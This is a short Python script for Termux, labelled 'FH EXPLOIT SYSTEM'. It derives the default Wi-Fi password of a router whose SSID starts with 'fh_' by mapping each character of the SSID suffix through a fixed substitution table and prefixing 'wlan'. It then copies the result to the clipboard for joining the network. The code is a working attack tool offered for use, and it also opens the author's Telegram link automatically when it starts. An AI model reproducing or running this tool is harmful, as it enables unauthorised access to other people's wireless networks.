import os, time, urllib.request

# --- [ CONFIG ] ---
# تم تحديث الرابط إلى حسابك الجديد
TELEGRAM_LINK = "https://t.me/m_oha0_2b" 

G = '\033[1;32m' # Green
W = '\033[1;37m' # White
B = '\033[1;34m' # Blue
Y = '\033[1;33m' # Yellow
R = '\033[1;31m' # Red
C = '\033[1;36m' # Cyan

# Full Bidirectional Mapping for FH (Corrected)
MAP = {
    'e':'1', '1':'e', 'd':'2', '2':'d',
    'c':'3', '3':'c', 'b':'4', '4':'b',
    'a':'5', '5':'a', '9':'6', '6':'9',
    '8':'7', '7':'8', 'f':'0', '0':'f'
}

def banner():
    os.system("clear")
    # فتح الرابط الجديد تلقائياً
    os.system(f"termux-open-url {TELEGRAM_LINK}")
    
    print(f"{G}")
    print(r"""
    ███████╗██╗  ██╗    ██████╗ ██████╗  █████╗ ██╗  ██╗ ██████╗ 
    ██╔════╝██║  ██║    ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔═══██╗
    █████╗  ███████║    ██║  ██║██████╔╝███████║█████╔╝ ██║   ██║
    ██╔══╝  ██╔══██║    ██║  ██║██╔══██╗██╔══██║██╔═██╗ ██║   ██║
    ██║     ██║  ██║    ██████╔╝██║  ██║██║  ██║██║  ██╗╚██████╔╝
    ╚═╝     ╚═╝  ╚═╝    ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ 
    """)
    print(f"{C}[+] {W}FH EXPLOIT SYSTEM {C}| {G}BY: MOHA-02")
    print(f"{C}[+] {Y}TELEGRAM: {W}@m_oha0_2b")
    print(f"{G}----------------------------------------------------------")

def start_exploit():
    banner()
    print(f"{Y}[*] SYSTEM READY. Waiting for SSID...")
    ssid = input(f"{G}[#] Target SSID (e.g., fh_5d620): {W}")
    
    if "fh_" in ssid.lower():
        print(f"{B}[*] Running Bidirectional Algorithm...")
        time.sleep(1.2)
        
        # Calculation
        suffix = ssid.lower().split("fh_")[-1]
        password = "wlan" + "".join([MAP.get(c, c) for c in suffix])
        
        print(f"{G}----------------------------------------------------------")
        print(f"{G}[+] ANALYSIS COMPLETE")
        print(f"{C}[>] SSID: {W}{ssid}")
        print(f"{C}[>] KEY : {G}{password}")
        print(f"{G}----------------------------------------------------------")
        
        # Auto-copy to clipboard
        os.system(f"echo '{password}' | termux-clipboard-set")
        print(f"{Y}[!] Password copied! Paste it in your WiFi settings.")
        
    else:
        print(f"{R}[!] Error: Please enter a valid FH SSID.")
        time.sleep(2)
        start_exploit()

if __name__ == "__main__":
    try:
        start_exploit()
    except KeyboardInterrupt:
        print(f"\n{R}[!] Tool stopped.")
